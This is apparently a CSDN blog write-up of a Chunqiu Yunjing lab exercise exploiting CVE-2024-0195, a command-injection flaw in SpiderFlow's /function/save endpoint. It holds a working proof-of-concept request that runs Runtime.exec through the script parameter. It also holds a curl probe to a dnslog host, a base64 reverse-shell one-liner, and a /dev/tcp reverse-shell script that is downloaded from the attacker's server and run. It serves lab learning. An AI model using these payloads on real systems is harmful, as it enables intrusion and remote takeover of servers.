春秋云镜CVE-2024-0195【记录】

最新推荐文章于 2024-06-24 10:49:44 发布
最新推荐文章于 2024-06-24 10:49:44 发布
阅读量732 收藏 9
点赞数 10
文章标签: web安全 网络安全 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhiquovo/article/details/136546999
版权

漏洞描述

SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionNameparametersscript 中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入,并允许远程发起攻击,可导致服务器失陷

POC

POST /function/save HTTP/1.1
Host: eci-2ze6dzdag3zeyw6svm2f.cloudeci1.ichunqiu.com:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 112


id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('此处执行命令')%3B%7B

漏洞位置 /function/save

提交参数时,script处可以插入恶意的代码达到命令执行

靶场解题

1.启动春秋云镜后,通过burp截取请求包。漏洞点截取,或者直接随便截取一个包,修改下target地址

将截取到的包发送到 repeater中
修改post中script传递的参数

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('此处执行命令')%3B%7B

我做靶场时遇到的问题

#先使用了  ping 命令使用dnslog测试,返回包中出现了报错,应该是不支持ping
#然后使用了curl 发现可以正常访问
exec('curl+kvoarh.dnslog.cn')

在这里卡了一小下,脑袋出问题了,想直接反弹shell ,发现没什么用

exec("bash -c {echo,6L+Z6YeM5LuA5LmI6YO95rKh5pyJ77yM5LuA5LmI6YO95rKh5pyJ}|{base64,-d}|{bash,-i}");

后面脑袋又灵光了

1.我们先自己通过云服务器构建一个1.sh 脚本文件

内容如下:
#!/bin/bash
bash -i >&/dev/tcp/ip/port 0>1&

2.然后通过python 启动一个http服务

python3 -m http.server port

3.burp发送包,下载我们远程服务器上的脚本 到/tmp目录下

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('curl -o /tmp/1.sh http://ip/port/脚本')%3B%7B

4.成功后,通过bash /tmp/脚本名称 运行脚本即可反弹shell  flag在根目录下

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('bash /tmp/1.sh')%3B%7B

题目解法很多,小白文章。

zhiquovo
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2024-0195:SpiderFlow爬虫平台代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
02-02 301
在SpiderFlow爬虫平台项目中 spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入
CVE-2024-0195-SpiderFlow爬虫平台远程命令执行漏洞分析
shelter1234567的博客
01-18 2072
本次我们继续模拟漏洞发掘的思路。此次选择的项目是一个基于springboot的开源项目,该系统/function/save接口存在RCE漏洞。
春秋云镜 CVE-2023-26469
qq274575499的博客
03-29 1481
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
CVE复现计划】CVE-2024-0195
m0_63138919的博客
04-05 1050
本文以春秋云镜为靶场,进行该CVE-2024-0195的漏洞原理学习,记录自己学习过程,还请大佬们师傅们指出文中错误
[春秋云镜]CVE-2014-3529
niubi707的博客
11-30 2388
[春秋云镜]CVE-2014-3529 Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。
春秋云境:CVE-2022-24112
一只爱吃橙子的羊
12-04 2284
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
春秋云境:CVE-2022-28060
一只爱吃橙子的羊
11-29 2404
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境:CVE-2022-26965
一只爱吃橙子的羊
11-29 2500
Pluck-CMS-Pluck-4.7.16 后台RCE
春秋云境:CVE-2022-23880
一只爱吃橙子的羊
12-06 1424
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
tomcat 升级到8.5.99后,系统启动不起来问题(修复 CVE-2024-24549 拒绝访问漏洞)
04-16
在8.5.98基础上,增加了修复 CVE-2024-24549 漏洞代码
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
网络安全网络安全威胁及途径
衍生星球的博客
06-17 207
目前,网络的主要应用包括:电子商务、网上银行、股票、证券、期货交易、即时通信、邮件、网游、下载文件或点击链接等,这些应用都存在大量的安全威胁和隐患。网络安全管理中出现的漏洞和疏忽都属于人为因素,网络安全中最突出的问题是缺乏完善的法律法规、管理准则规范和制度、网络安全组织机构及人员,不够重视或缺少安全检测及实时有效的监控、维护和审计。网络安全的威胁和风险主要涉及网络系统研发、结构、层次、范畴、应用和管理等,要做好网络安全防范,必须进行认真深入的调研、分析和研究,以解决网络系统的安全风险及隐患。
CVE-2018-8120漏洞提权:Windows 7的安全剖析与实战应用
最新发布
weixin_43822401的博客
06-24 283
CVE-2018-8120是一个Windows 7操作系统的本地权限提升漏洞。攻击者利用此漏洞,可以在目标系统上执行提权操作,从而获得更高级别的访问权限。
网络安全(补充)
m0_62207482的博客
06-15 685
物理安全威胁一般分为自然安全威胁和人为安全威胁。自然安全威胁包括地震、洪水、火灾、鼠害、雷电;;;;人为安全威胁包括盗窃、爆炸、毁坏、硬件安全 防火墙白名单策略:只允许符合安全规则的包通过防火墙,其他通信包禁止 防火墙名单策略:禁止与安全规则相冲突的包通过防火墙,其他通信包都允许 将入侵检测系统置于防火墙内部,使得很多对网络的攻击首先被防火墙过滤,也就是防火墙是首当其冲的,从而减少了对内部入侵检测系统的干扰,提高入侵检测系统的准确率,但是其检测能力不会变化 通过VPN技术,企业可以在远程用户、分
网络安全之Windows提权(上篇)(高级进阶)
weixin_70911257的博客
06-21 991
提权顾名思义就是提升我们的权限能够让我们去做更多的事,就好比皇帝跟大臣,很多事情只有皇帝能做,大臣做不了例如拟圣旨,掌管虎符,拥有所有人的生杀大权,我们提权的目的就是当皇帝,皇帝做的我们也能做。说一下我的渗透思路吧,首先通过对方服务器的各种漏洞将我们的一句话木马上传至对方的服务器然后通过各种渗透工具连接服务器拿到基本的shell权限,然后将权限提升至基本用户权限,再通过对方补丁漏洞提升至最高权限。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值